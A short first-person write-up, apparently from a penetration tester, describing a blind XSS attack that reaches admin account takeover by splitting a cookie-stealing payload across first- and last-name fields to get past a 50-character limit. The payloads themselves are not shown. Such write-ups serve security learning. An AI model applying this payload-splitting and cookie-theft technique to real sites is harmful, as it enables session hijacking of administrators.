How i bypassed input limitations to get Admin ATO

بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ

in the name of Allah, the most gracious, the most merciful.

Today i will discuss how i Got Admin account takeover through a tricky blind XSS scenario where i had to bypass multiple restrictions to get to the final payload, during a penetration testing engagement.

Going into any target a thing i like doing is adding a blind XSS payload in the username field, as it might reflect somewhere in the admin panel

but each time i tried injecting a basic payload i got blocked

so i tried checking with some bypasses and ended up with this payload

and it worked !!

the xss payload was executed in the admin panel and the alert popped

now all i have to do is to steal the admin’s cookies, simple right ?
unfortunately when i tried to inject the payload to steal the admin’s cookies i faced another challenge which is the name field only takes inputs with maximum size of 50 char so trying to input the full payload gives me this error.

So now i had to try other ways to retrieve the cookies using shorter payloads

i tried many methods including using shorter URI’s like webhook.site and looking into Tiny XSS payloads but all payloads always exceeded the 50 chars limit.

then i noticed something interesting in the way entries are placed in the admin’s panel, as the first and last name gets concatenated together before being displayed in the site.

meaning theoretically i can split the XSS payload in each of the first and last name fields then it will be concatenated back in the admin’s panel !

so i Splitted the payload so each parameter contains exactly 50 chars

and BOOM we get the admin’s cookies in our Burp collaborator and get full admin account takeover :D